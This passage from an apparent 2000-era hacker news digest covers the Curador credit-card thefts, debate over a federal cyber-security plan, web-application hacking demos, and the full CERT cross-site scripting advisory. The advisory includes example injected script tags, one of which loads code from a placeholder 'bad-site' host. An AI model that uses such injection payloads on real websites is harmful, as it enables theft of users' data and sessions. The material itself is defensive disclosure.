apparent among the handful of shoppers contacted by InternetNews and whose credit cards were stolen and posted at the Curador site. Leslie Lowdermilk, a research analyst in Texas, said she began shopping online this past holiday season, drawn by the convenience. Noting that card holders are generally responsible for only the first $50 of fraudulent charges, Lowdermilk said the incident hasn't scared her off from making future online purchases. "When faced with either going to the mall at Christmas time or sitting in the comfort of my own home and shopping, I would much rather shop over the Internet than face the crowds. I think most places are reputable, and I've know lots of people who've done lots of shopping and never had a problem," she said. In the message at the Curador site, the cracker suggests that he exploited a weakness in Microsoft's (MSFT) SQL Server relational database. "Greetz to my friend Bill Gates, I think that any guy who sells Products Like SQL Server, with default world readable permissions can't be all BAD," wrote the cracker. According to Russ Cooper, operator of the NTbugtraq mailing list, SQL server by default installs some files with world readable permission. But Cooper denied that Microsoft's product was inherently insecure. "Most commercial software packages install with loose or nonexistent permissions so that you can get them working easier and then lock it down. And most people don't," Cooper said. Notice of the break-in was sent to HackerNews.com early Tuesday morning. The message headers suggest it was sent using a dial-up account at Global Internet in the United Kingdom. According to Space Rogue, one of the operators of the HackerNews site and a security expert with consulting firm AtStake, the victimized site was apparently storing credit card numbers on its Web server, despite repeated warnings by security experts that the data should instead be transferred to a secure server not connected to the Internet. "You'd think it was common sense, but every other week we have another ecommerce site that's vulnerable and attacked, and I don't know how long it's going to take for people to learn," said Space Rogue. @HWA 89.0 HNN: Feb 2nd: Clinton Cyber Security Plan Draws Fire ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Apocalyse Dow The recently proposed plan to safeguard critical systems against cyber attacks is alarming privacy advocates. Critics of the plan say that it relies too much on monitoring and surveillance and not enough on making systems more secure. The director of The Critical Infrastructure Assurance Office, John Tritak, has said that the plan is still in the planning stages and will evolve as time goes on. InfoWorld http://www.infoworld.com/articles/en/xml/00/02/01/000201enprivate.xml WIRED http://www.wired.com/news/politics/0,1283,34027,00.html Federal Computer Week http://www.fcw.com/fcw/articles/2000/0131/web-privacy-02-02-00.asp ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2431233,00.html?chkpt=zdnntop InfoWorld: U.S. cyber-attack protection plan draws criticism By Jennifer Jones Privacy advocates Tuesday raised red flags before a U.S. Senate Judiciary Subcommittee looking into privacy implications of President Clinton's plan to safeguard critical systems against cyber attacks. Critics of the plan charged specifically that the Clinton Administration is relying "too heavily on monitoring and surveillance" instead of simply focusing on making systems more secure, according to Marc Rotenberg, executive director of the Electronic Privacy Information Center (EPIC). The Clinton Administration last month released its first "blueprint" for protecting critical government and private sector systems against hackers. Called the National Plan for Information Systems Protection, the plan eventually will loop in critical systems for communications, transportation, and financial services. "There is disagreement as to whether an intrusive, government-directed initiative that views computer security as almost solely defending 'our cyberspace' from foreign assault is the right way to go," Rotenberg said in prepared testimony. EPIC officials especially took exception to the plan's inclusion of a Federal Intrusion Detection Network (FIDNET). Under the plan, a single government agency would be allowed to monitor communications across all federal networks. Rotenberg argued that FIDNET would require notification to all users of federal systems, including government employees and the public, or would break various privacy statutes including wiretapping guidelines. EPIC officials also said that the government's security policy overall has been inconsistent because it has prevented availability of some encryption and security tools. John Tritak, director of the President's Critical Infrastructure Assurance Office, however, countered that the plan, dubbed Version 1.0, is still in its preliminary stages. "The plan is designated Version 1.0 and subtitled 'An Invitation to a Dialog' to indicate that it is still a work in progress and that a broader range of perspectives must be taken into account if the plan is truly to be national in scope and treatment," Tritak said. Part of the unfolding plan calls for a partnership between Fortune 500 companies and all levels of government to work out details for safeguarding computers. The U.S. Chamber of Commerce this month will hold an initial meeting on private sector contributions to and participation in the plan. Privacy must play a key part in any efforts to hone details of the plan, Rotenberg warned. "I urge you to proceed very cautiously. The government is just now digging itself out of the many mistakes that were made over the past decade with computer security policy. This is not the best time to be pushing an outdated approach to network security," Rotenberg said. The U.S. Senate Judiciary Committee's Subcommittee on Technology, Terrorism, and Government Information, in Washington, is at www.senate.gov/~judiciary . The Electronic Privacy Information Center, in Washington, is at www.epic.org . The National Information Protection Center, in Washington, is at www.fbi.gov/nipc . Jennifer Jones is an InfoWorld senior editor. -=- Wired; http://www.wired.com/news/politics/0,1283,34027,00.html Cyber Safe or Gov't Surveillance? by Declan McCullagh 10:40 a.m. 1.Feb.2000 PST WASHINGTON -- A government plan to monitor networks for intrusions goes too far and will lead to increased surveillance and privacy violations, a civil liberties group told a Senate panel on Tuesday. The Electronic Privacy Information Center said a memo it obtained last week shows that the Clinton administration's FIDNET proposal for "information systems protection" will result in unwarranted spying on Americans. Documents the group received through a Freedom of Information Act request indicate the administration is considering broad access to credit card and phone records of private citizens and monitoring of government workers' computers, EPIC director Marc Rotenberg told the Senate judiciary subcommittee on technology and terrorism. "The FIDNET proposal, as currently conceived, must simply be withdrawn. It is impermissible in the United States to give a federal agency such extensive surveillance authority," Rotenberg told the panel chaired by Jon Kyl, an Arizona Republican. The privacy problems of FIDNET and similar government efforts are exaggerated, said Critical Infrastructure Assurance Office director John Tritak. "FIDNET is intended to protect information on critical, civilian government computer systems, including that provided by private citizens. It will not monitor or be wired into private sector computers," Tritak said. "All aspects of the FIDNET will be fully consistent with all laws protecting the civil liberties and privacy rights of Americans." Tritak showed up to discuss the so-called "National Plan for Information Systems Protection, Version 1.0," which the government released in January. It calls for additional government spending to thwart a "highly organized, systematic cyberattack by hostile powers or terrorist organizations." The 199-page plan includes a chapter titled "protecting privacy and civil liberties." The chapter calls for an annual "public-private colloquium" and review of privacy practices by "appropriate authorities." But it does not say the CIAO will reveal even summaries of its activities -- the sort of regular review required of federal prosecutors who ask for wiretaps of phone lines. "Nowhere does the Plan answer such questions as what formal reporting requirements will be established, what independent review will be conducted, and what mechanisms for public accountability and government oversight will be put in place," EPIC's Rotenberg said. Also testifying was Frank Cilluffo, deputy director of the organized crime project at the Center for Strategic & International Studies. CSIS has close ties to the military, and last month appointed soon-to-be former deputy secretary of defense John Hamre as its president and CEO. Cilluffo sided with CIAO: "Throughout history, the first obligation of the state has been to protect its citizens. Today is no exception." "Overall, I think the [CIAO] plan does an excellent job identifying gaps and shortfalls within the federal government, and charting an initial course of action to address them. My major concern is that it does not do enough," Ciluffo said. FIDNET, the part of the overall CIAO plan aimed at detecting intrusions into federal computers, came under fire last summer. Civil liberties groups and some legislators warned it could be too intrusive and could monitor the private-sector Internet. The Justice Department didn't help matters by replying last September in a letter that said FIDNET would not -- at least, as currently "envisioned." During the hearing Tuesday, CIAO's Tritak echoed what other law enforcement representatives have said: "One person with a computer, a modem, and a telephone line anywhere in the world can potentially break into sensitive government files, shut down an airport's air traffic control system, or disrupt 911 services for an entire community." A top FBI official said the same thing in January, warning that electric power is vulnerable to miscreant hackers. But a person close to the North American Electric Reliability Council -- a trade association of electric power generating companies -- told Wired News that he wasn't aware of any power control computers hooked up to telephone lines or the Internet. @HWA 90.0 HNN: Feb 2nd: AntiPiracy Campaign Increases Sales ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Microsoft is claiming a sales increase in Estonia, Latvia and Lithuania is the result of a massive anti-piracy campaign there. Microsoft has reported that while piracy rates in these countries are still above 72% (they were as high as 92% in some of countries) software sales have increased by as much as 500%. (Interesting how absolutely no other factors contributed to the increase in sales over the six month period, at least according to MS.) Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500162049-500204023-500922895-0,00.html Microsoft pleased with anti-piracy campaign in Baltics Copyright © 2000 Nando Media Copyright © 2000 Agence France-Press VILNIUS, Lithuania (February 1, 2000 11:59 a.m. EST http://www.nandotimes.com) - An anti-piracy software campaign recently launched in the Baltic states of Estonia, Latvia and Lithuania has significantly lifted Microsoft's sales in the region, a company official announced Tuesday. "It was a tremendous success and we are starting to build our business in these countries," Bo Cruse, Microsoft managing director for the Baltic region said at a briefing in Vilnius. At the end of the six-month campaign, Microsoft's sales in January were up around 500 percent in Lithuania, and 300 percent in Estonia and Latvia. Software piracy remains common in the Baltic states. According to Microsoft's estimates the percentage of illegal software dipped only from 92 percent to 81 percent in Lithuania, from 90 percent to 85 percent in Latvia and from 86 percent to 72 percent in Estonia following the legalization campaign. The average for Europe is about 40 percent and for the Nordic countries about 35 percent, according to Norvald Heidel, Microsoft's anti-piracy manager for the Baltic and Nordic regions. Microsoft and the Business Software Alliance also worked with police and computer sellers to promote enforcement of software licenses. More than 30 court cases have been filed for copyright infringement following a crackdown on resellers and private users. A Lithuanian government official admitted that 40-60 percent of the government's software is illegal, and said that nearly $1 million would be needed to buy legal copies. @HWA 91.0 HNN: Feb 2nd: Web Aps, the New Playground ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by freqout PC World sees things that make them fear putting their data online, when anyone with a little knowledge of how web applications work, can gain access to other's data. Breaking Web applications has become the hack du jour over buffer overflows, fragmented packets, and default scripts/passwords. (This article specifically mentions Perfecto which seems to like the fear tactic way of selling its product, break into the site in front of the customer and then sell them your solution. Slimy.) PC World http://www1.pcworld.com/ontheweb/article/0,1978,14415,00.html From PC World Online The Web Is a Hacker's Playground by Christina Wood I don't scare easily. But I've been terrified twice in the past year. The first time it happened was while I watched The Blair Witch Project at a local theater. The second time was during a demonstration of a new software product. Now, I've seen a million software demos, and in the vast majority of these my biggest fear is that I'll fall asleep. This time, though, I found myself perched on the edge of my seat. Eran Reshef, cofounder and vice president of Perfecto Technologies, was showing me why he thinks the world needs his company's product, a security package (priced at upward of $50,000) that is designed to protect Web sites from hacker attacks. As I sat there watching, Reshef demonstrated how he could transform just about any Web site into his own personal playground. And though Reshef and most of his technical staff are former members of an elite technical unit in the Israeli Army, he denied that he possesses the hacking talents of a once-in-an-eon technical genius. In fact, Reshef was careful to characterize his skills as fairly common. He said that practically anyone who can put up a Web site--and has a burglar's moral code--can take a site down. Those same skills can be used (and this is when I really got frightened) to plunder a site for confidential information about its users. I don't want to alert any hackers out there to security holes that are waiting to be breached. So I won't mention the names of the Web sites I saw Reshef gain access to-but they're ones you know, maybe even ones you do business with. Reshef would spend 15 minutes or so editing HTML code and performing other technical tricks...and then I'd see the names and passwords of a site's programmers scroll across his computer screen. He dropped items into his shopping cart at various e-commerce sites, including the online home of a major computer vendor, and then changed their prices at will. He also downloaded customer information from an airline's frequent-flyer site, and he described to me how he was able to make trades from the account of the CIO of a large online brokerage firm--while the CIO looked on. "This is bad," Reshef announced at one point in his demonstration for me. "The game is over--I can do anything I want [at this site] right now." Gulp. Protection Racket? Reshef didn't have to hack around firewalls or break encryption. He accomplished his break-ins using only his Web browser, some know-how, and maybe a little programming code. Reshef (and presumably hackers who use their abilities less benignly) hunts around Web pages for little programming mistakes. These subtle errors--Reshef says most programmers make them from time to time--offer knowledgeable snoops points of entry to a site's server. And once they have that access, they can cause all kinds of mayhem. Not that Reshef would--he's a nice guy. In fact, one analyst I spoke to described him as a Boy Scout. And the break-ins he performed were done only after obtaining the permission of the sites' proprietors. But in retrospect, I can't help imagining him appearing in an episode of the HBO series The Sopranos selling protection against the depredations of a frightening group of high-tech wise guys. Shortly after taking in Reshef's demonstration, I saw a report of a popular news site (which will also remain nameless) being taken completely down by an unknown hacker or hackers. I called the site manager to see whether the break-in involved the kind of hacking Reshef showed me. She said no. The site had simply had a problem with an FTP server, which was now fixed. Besides, she told me, the kind of thing I was describing to her was impossible. "Did you ever think maybe you were getting a snake-oil pitch?" she asked. "'Here's the disease, now here's the medicine you need to cure it?'" That's a reasonable question, I thought. So I did some checking. "The problem that Perfecto is targeting is right on the money," counters Mike Zboray, vice president and research director for the Gartner Group, an industry research firm. "Take a look at your typical Web server configured for use on the Net. The people who do that configuration are not terribly meticulous about the underlying code, and they aren't meticulous about how they have safeguarded the content they have created. When it works, they put it up. Is that good enough for e-commerce? Probably not." For quite a while, Zboray has been warning his clients to be diligent about protecting their Web sites from this kind of intrusion, either by plugging holes themselves or, more recently, by buying Perfecto's software. But to make his point, he has sometimes been forced to perform a little hacking of his own. "I'm not nearly as good at this as Reshef is, but I have been able to get complete access to servers. I do it just to demonstrate how people are exposed." A similar demonstration by Reshef persuaded Quote.com's Kaj Pedersen that his site needed Perfecto. "The selling point for me was when Reshef changed my password and was able to get my access privileges to the site," explains Pedersen, vice president of engineering at the financial market data site. Okay, I'm scared. And naturally, my first concern is for my own wallet. I practically live on the Internet. Are my life and finances an open book for every intelligent reprobate who has a browser? That depends. "If I were a vendor, I would be deathly afraid," says Zboray. "If I were a bank I would be deathly afraid. And anyone who is doing a company extranet should definitely worry if they have sensitive company data out there." On the other hand, Zboray believes, consumers shouldn't panic about the state of security on the Web. "I'm not afraid of using my credit card [at e-commerce sites]--the credit card companies are shielding me from responsibility for any fraudulent charges of more than $50." Much the same is true at online banks: A bank's FDIC insurance shields your account from loss if your bank--online or otherwise--is robbed. Watching Your Wallet Despite such reassurances, you still need to be careful where you take your business online. "Most sites that are doing e-commerce should have some kind of security statement with regard to how your transactions are secured," suggests Matthew Devost, senior analyst for Security Design International, a company that provides security consulting to large corporations and e-commerce companies. Look for that statement and read it carefully before you provide personal information to a site. If a site doesn't carry such a statement, and you're doing more than making a purchase there, call and grill a knowledgeable company representative on how safe the site is. Ask if the site uses an outside firm to test its security. Companies generally don't like to provide much detail--because they don't want to give away any secrets--but you need to make sure that they're taking measures to protect their site from intruders. "At the moment, only a small percentage of people call us to ask about security," says Quote.com's Pedersen. "It's mostly those who understand the technology and are concerned about how we will protect their personal data concerning their net worth. But I think these questions will become increasingly common as people begin to understand the vulnerabilities. I think people should be asking these questions." No Safety in Numbers Of course, the Web will never be entirely free of security threats. "There are a lot of smart people out there," says Devost. "And they will always find a way in if there is something they want." And unfortunately, there's no easy way to tell how safe a site is. That's partly because sites are reticent about divulging security information and partly because many sites are unaware of the risks. "I see a time where there might be a Good Housekeepingstyle seal of approval for the security of sites," says Devost. "There are organizations that do that now for privacy. Why not for security?" Oh, and another thing. If you're a Web site manager, don't make the mistake of challenging a hacker. I told Eran Reshef about the news site's suggestion that Perfecto's business model was nothing more than a snake-oil pitch. Within 30 minutes, Reshef told me, Perfecto had gained access to the source code on the news site's server. He added, "That means I can do pretty much anything, including shut down the site." But since Reshef is a Boy Scout, the Web site in question managed to escape unscathed--this time. But if I had a Web-based business--or any plans to open one--I'd be thinking very seriously about hiring a bodyguard. Christina Wood is a PC World contributing editor. @HWA 92.0 HNN: Feb 3rd: Malicious HTML Tags Embedded in Client Web Requests ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Shill Cross-site scripting has become such a major concern it is has finally prompted CERT to release a security advisory. The problem is that no one verifies input data on a web form or when dynamically generating pages. This allows someone to potentially insert damaging code that will be automatically run. No one has been victimized yet but the potential risk is huge, effecting every browser and web page. To protect yourself from this risk CERT recommends that you turn off cookies, all java and "Not Engage in Promiscuous Browsing". CERT http://www.cert.org/advisories/CA-2000-02.html Associated Press - via San Jose Mercury News http://www.sjmercury.com/svtech/news/breaking/ap/docs/165817l.htm CERT: CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests This advisory is being published jointly by the CERT Coordination Center, DoD-CERT, the DoD Joint Task Force for Computer Network Defense (JTF-CND), the Federal Computer Incident Response Capability (FedCIRC), and the National Infrastructure Protection Center (NIPC). Original release date: February 2, 2000 Last revised: February 3, 2000 A complete revision history is at the end of this file. Systems Affected Web browsers Web servers that dynamically generate pages based on unvalidated input Overview A web site may inadvertently include malicious HTML tags or script in a dynamically generated page based on unvalidated input from untrustworthy sources. This can be a problem when a web server does not adequately ensure that generated pages are properly encoded to prevent unintended execution of scripts, and when input is not validated to prevent malicious HTML from being presented to the user. I. Description Background Most web browsers have the capability to interpret scripts embedded in web pages downloaded from a web server. Such scripts may be written in a variety of scripting languages and are run by the client's browser. Most browsers are installed with the capability to run scripts enabled by default. Malicious code provided by one client for another client Sites that host discussion groups with web interfaces have long guarded against a vulnerability where one client embeds malicious HTML tags in a message intended for another client. For example, an attacker might post a message like Hello message board. This is a message. <SCRIPT>malicious code</SCRIPT> This is the end of my message. When a victim with scripts enabled in their browser reads this message, the malicious code may be executed unexpectedly. Scripting tags that can be embedded in this way include <SCRIPT>, <OBJECT>, <APPLET>, and <EMBED>. When client-to-client communications are mediated by a server, site developers explicitly recognize that data input is untrustworthy when it is presented to other users. Most discussion group servers either will not accept such input or will encode/filter it before sending anything to other readers. Malicious code sent inadvertently by a client for itself Many Internet web sites overlook the possibility that a client may send malicious data intended to be used only by itself. This is an easy mistake to make. After all, why would a user enter malicious code that only the user will see? However, this situation may occur when the client relies on an untrustworthy source of information when submitting a request. For example, an attacker may construct a malicious link such as <A HREF="http://example.com/comment.cgi? mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A> When an unsuspecting user clicks on this link, the URL sent to example.com includes the malicious code. If the web server sends a page back to the user including the value of mycomment, the malicious code may be executed unexpectedly on the client. This example also applies to untrusted links followed in email or newsgroup messages. Abuse of other tags In addition to scripting tags, other HTML tags such as the <FORM> tag have the potential to be abused by an attacker. For example, by embedding malicious <FORM> tags at the right place, an intruder can trick users into revealing sensitive information by modifying the behavior of an existing form. Other HTML tags can also be abused to alter the appearance of the page, insert unwanted or offensive images or sounds, or otherwise interfere with the intended appearance and behavior of the page. Abuse of trust At the heart of this vulnerability is the violation of trust that results from the "injected" script or HTML running within the security context established for the example.com site. It is, presumably, a site the browser victim is interested in enough to visit and interact with in a trusted fashion. In addition, the security policy of the legitimate server site example.com may also be compromised. This example explicitly shows the involvement of two sites: <A HREF="http://example.com/comment.cgi? mycomment=<SCRIPT SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A> Note the SRC attribute in the <SCRIPT> tag is explicitly incorporating code from a presumably unauthorized source (bad-site). Both of the previous examples show violations of the same-source origination policy fundamental to most scripting security models: Netscape Communicator Same Origin Policy Microsoft Scriptlet Security Because one source is injecting code into pages sent by another source, this vulnerability has also been described as "cross-site" scripting. At the time of publication, malicious exploitation of this vulnerability has not been reported to the CERT/CC. However, because of the potential for such exploitation, we recommend that organization CIOs, managers, and system administrators aggressively implement the steps listed in the solution section of this document. Technical feedback to appropriate technical, operational, and law enforcement authorities is encouraged. II. Impact Users may unintentionally execute scripts written by an attacker when they follow untrusted links in web pages, mail messages, or newsgroup postings. Users may also unknowingly execute malicious scripts when viewing dynamically generated pages based on content provided by other users. Because the malicious scripts are executed in a context that appears to have originated from the targeted site, the attacker has full access to the document retrieved (depending on the technology chosen by the attacker), and may send data contained in the page back to their site. For example, a malicious script can read fields in a form provided by the real server, then send this data to the attacker. Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. Specifically, Java applets do not provide the attacker with any access to the DOM. Alternatively, the attacker may be able to embed script code that has additional interactions with the legitimate web server without alerting the victim. For example, the attacker could develop an exploit that posted data to a different page on the legitimate web server. Also, even if the victim's web browser does not support scripting, an attacker can alter the appearance of a page, modify its behavior, or otherwise interfere with normal operation. The specific impact can vary greatly depending on the language selected by the attacker and the configuration of any authentic pages involved in the attack. Some examples that may not be immediately obvious are included here. SSL-Encrypted Connections May Be Exposed The malicious script tags are introduced before the Secure Socket Layer (SSL) encrypted connection is established between the client and the legitimate server. SSL encrypts data sent over this connection, including the malicious code, which is passed in both directions. While ensuring that the client and server are communicating without snooping, SSL makes no attempt to validate the legitimacy of data transmitted. Because there really is a legitimate dialog between the client and the server, SSL reports no problems. Malicious code that attempts to connect to a non-SSL URL may generate warning messages about the insecure connection, but the attacker can circumvent this warning simply by running an SSL-capable web server. Attacks May Be Persistent Through Poisoned Cookies Once malicious code is executing that appears to have come from the authentic web site, cookies may be modified to make the attack persistent. Specifically, if the vulnerable web site uses a field from the cookie in the dynamic generation of pages, the cookie may be modified by the attacker to include malicious code. Future visits to the affected web site (even from trusted links) will be compromised when the site requests the cookie and displays a page based on the field containing the code. Attacker May Access Restricted Web Sites from the Client By constructing a malicious URL an attacker may be able to execute script code on the client machine that exposes data from a vulnerable server inside the client's intranet. The attacker may gain unauthorized web access to an intranet web server if the compromised client has cached authentication for the targeted server. There is no requirement for the attacker to masquerade as any particular system. An attacker only needs to identify a vulnerable intranet server and convince the user to visit an innocent looking page to expose potentially sensitive data on the intranet server. Domain Based Security Policies May Be Violated If your browser is configured to allow execution of scripting languages from some hosts or domains while preventing this access from others, attackers may be able to violate this policy. By embedding malicious script tags in a request sent to a server that is allowed to execute scripts, an attacker may gain this privilege as well. For example, Internet Explorer security "zones" can be subverted by this technique. Use of Less-Common Character Sets May Present Additional Risk Browsers interpret the information they receive according to the character set chosen by the user if no character set is specified in the page returned by the web server. However, many web sites fail to explicitly specify the character set (even if they encode or filter characters with special meaning in the ISO-8859-1), leaving users of alternate character sets at risk. Attacker May Alter the Behavior of Forms Under some conditions, an attacker may be able to modify the behavior of forms, including how results are submitted. III. Solution Solutions for Users None of the solutions that web users can take are complete solutions. In the end, it is up to web page developers to modify their pages to eliminate these types of problems. However, web users have two basic options to reduce their risk of being attacked through this vulnerability. The first, disabling scripting languages in their browser, provides the most protection but has the side effect for many users of disabling functionality that is important to them. Users should select this option when they require the lowest possible level of risk. The second solution, being selective about how they initially visit a web site, will significantly reduce a user's exposure while still maintaining functionality. Users should understand that they are accepting more risk when they select this option, but are doing so in order to preserve functionality that is important to them. Unfortunately, it is not possible to quantify the risk difference between these two options. Users who decide to continue operating their browsers with scripting languages enabled should periodically revisit the CERT/CC web site for updates, as well as review other sources of security information to learn of any increases in threat or risk related to this vulnerability. Web Users Should Disable Scripting Languages in Their Browsers Exploiting this vulnerability to execute code requires that some form of embedded scripting language be enabled in the victim's browser. The most significant impact of this vulnerability can be avoided by disabling all scripting languages. Note that attackers may still be able to influence the appearance of content provided by the legitimate site by embedding other HTML tags in the URL. Malicious use of the <FORM> tag in particular is not prevented by disabling scripting languages. Detailed instructions to disable scripting languages in your browser are available from our Malicious Code FAQ: http://www.cert.org/tech_tips/malicious_code_FAQ.html Web Users Should Not Engage in Promiscuous Browsing Some users are unable or unwilling to disable scripting languages completely. While disabling these scripting capabilities is the most effective solution, there are some techniques that can be used to reduce a user's exposure to this vulnerability. Since the most significant variations of this vulnerability involve cross-site scripting (the insertion of tags into another site's web page), users can gain some protection by being selective about how they initially visit a web site. Typing addresses directly into the browser (or using securely stored local bookmarks) is likely to be the safest way of connecting to a site. Users should be aware that even links to unimportant sites may expose other local systems on the network if the client's system resides behind a firewall, or if the client has cached credentials to access other web servers (e.g., for an intranet). For this reason, cautious web browsing is not a comparable substitute for disabling scripting. With scripting enabled, visual inspection of links does not protect users from following malicious links, since the attacker's web site may use a script to misrepresent the links in the user's window. For example, the contents of the Goto and Status bars in Netscape are controllable by JavaScript. Solutions for Web Page Developers and Web Site Administrators Web Page Developers Should Recode Dynamically Generated Pages to Validate Output Web site administrators and developers can prevent their sites from being abused in conjunction with this vulnerability by ensuring that dynamically generated pages do not contain undesired tags. Attempting to remove dangerous meta-characters from the input stream leaves a number of risks unaddressed. We encourage developers to restrict variables used in the construction of pages to those characters that are explicitly allowed and to check those variables during the generation of the output page. In addition, web pages should explicitly set a character set to an appropriate value in all dynamically generated pages. Because encoding and filtering data is such an important step in responding to this vulnerability, and because it is a complicated issue, the CERT/CC has written a document which explores this issue in more detail: http://www.cert.org/tech_tips/malicious_code_mitigation.html Web Server Administrators Should Apply a Patch From Their Vendor Some web server products include dynamically generated pages in the default installation. Even if your site does not include dynamic pages developed locally, your web server may still be vulnerable. For example, your server may include malicious tags in the "404 Not Found" page generated by your web server. Web server administrators are encouraged to apply patches as suggested by your vendor to address this problem. Appendix A contains information provided by vendors for this advisory. We will update the appendix as we receive more information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact your vendor directly. Appendix A. Vendor Information Apache More information from apache can be found at http://www.apache.org/info/css-security iPlanet - A Sun-Netscape Alliance Additional information from iPlanet can be found at: http://developer.iplanet.com/docs/technote/security/cert_ca2000_02.ht ml Microsoft Microsoft is providing information and assistance on this issue for its customers. This information will be posted at www.microsoft.com/security/. Sun Microsystems, Inc. Please see recommendations for Java Web Server at: http://sun.com/software/jwebserver/faq/jwsca-2000-02.html Sun is also providing information on security issues in general. This information is posted at http://java.sun.com/security A good introduction is in http://java.sun.com/sfaq While any web-based object, including Java Applets, can be unintentionally loaded through the mechanisms described in this advisory, once they are loaded the Java security mechanisms prevent any harmful information from being disclosed or client information from being damaged. Our thanks to Marc Slemko, Apache Software Foundation member; Iris Associates; iPlanet; the Microsoft Security Response Center, the Microsoft Internet Explorer Security Team, and Microsoft Research. This document is available from: http://www.cert.org/advisories/CA-2000-02.html CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT® Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message. Copyright 2000 Carnegie Mellon University. Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. Revision History February 2, 2000: Initial release. February 3, 2000: Clarifications on impact of Java applets. New vendor information. -=- Associated Press http://www.sjmercury.com/svtech/news/breaking/ap/docs/165817l.htm Experts warn of Web surfing risk sBY TED BRIDIS Associated Press Writer WASHINGTON (AP) -- The nation's top computer experts warned Internet users Wednesday about a serious new security threat that allows hackers to launch malicious programs on a victim's computer or capture information a person volunteers on a Web site, such as credit card numbers. The threat, dubbed ``cross-site scripting,'' involves dangerous computer code that can be hidden within innocuous-looking links to popular Internet sites. The links can be e-mailed to victims or published to online discussion groups and Web pages. The vulnerability was especially unusual because it is not limited to software from any particular company. Any Web browser on any computer visiting a complex Web site is at risk. No one apparently has been victimized yet. But the risks were described as potentially so serious and affected such a breadth of even the largest, most successful Web sites that the industry's leading security group said nothing consumers can do will completely protect them. Only a massive effort by Web site designers can eliminate the threat, according to the CERT Coordination Center of Carnegie Mellon University and others. Software engineers at CERT issued the warning Wednesday together with the FBI and the Defense Department. The problem, discovered weeks ago but publicly disclosed Wednesday, occurs when complex Internet sites fail to verify that hidden software code sent from a consumer's browser is safe. Experts looking at how often such filtering occurred found that Internet sites failing to perform that important safety check were ``the rule rather than the exception,'' said Scott Culp, the top security program manager at Microsoft. ``Any information that I type into a form, what pages I visit on that site, anything that happens in that session can be sent to a third-party, and it can be done transparently,'' Culp warned. He added: ``You do have to click on a link or follow a link in order for this to happen.'' The dangerous code also can alter information displayed in a consumer's Web browser, such as account balances or stock prices at financial sites. And it can capture and quietly forward to others a Web site's ``cookie,'' a small snippet of data that could help hackers impersonate a consumer on some Internet pages. ``It really goes across a huge number of sites,'' said Marc Slemko, a Canadian software expert who studied the problem. Slemko said Internet-wide repairs will be ``a very, very major undertaking.'' In the interim, experts strongly cautioned Internet users against clicking on Web links from untrusted sources, such as unsolicited e-mail or messages sent to discussion forums. They also recommended that consumers at least consider preventing their Web browser software from launching small programs, called scripts. But they acknowledged that many Internet sites require that function to operate. ``A large number of sites simply aren't usable'' without those functions, Slemko said. Microsoft said it planned to publish full details and step-by-step instructions for consumers at its Web site, www.microsoft.com/security. (PROFILE (CO:Microsoft Corp; TS:MSFT; IG:SOF;) ) @HWA 93.0 HNN: Feb 3rd: Curador Posts More CC Numbers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Curador After having his Xoom.com web site shut down after posting 1000 credit card numbers Curador has moved on to Geocities. This time he is posting several thousand numbers from four different e-commerce sites and he is including names and addresses. The new GeoCities site has been online and active for almost 24 hours, while their abuse department has been contacted it is unknown how long the site will remain active. Curador has claimed to have posted the numbers from http://www.shoppingthailland.com, http://www.ltamedia.com and two sites hosted at http://www.promobility.net. APB News http://www.apbnews.com/newscenter/internetcrime/2000/02/01/hack0201_01.html Was Bill Gates' Credit Card Number Online? Teen Claims It Was One of Hundreds He Posted Feb. 1, 2000 By David Noack NEW YORK (APBnews.com) -- A self-proclaimed teenage "cracker" who claims to have gotten into the database of an e-commerce site has posted hundreds of credit card numbers online -- including one he says belongs to Microsoft Chairman Bill Gates. The 18-year-old uses the name Curador, which means custodian. In an e-mail message today, he said he had posted 1,000 credit card numbers and promised to post another thousand in the next two days. Curador disowned the term "hacker" on the grounds that he trespasses on sites but does not destroy data. Instead, he prefers the word "cracker." The credit card numbers were posted on a personal home page at Xoom.com, which is part of the family of NBCi, a subsidiary of the broadcasting network. Xoom removed the page at around 12:30 p.m. today. Visitor to page blew whistle Roger Maes, director of investor relations for NBCi, said the company received information early today that a Web site was posting credit card information. Maes could not say how long the site had been online or how many people might have viewed it. He said the company is reporting the incident to the "proper authorities." "We have a dedicated group internally who all they do is monitor terms of service violations, and we also encourage our visitors as well as other home page members to report any terms-of-service violations," Maes 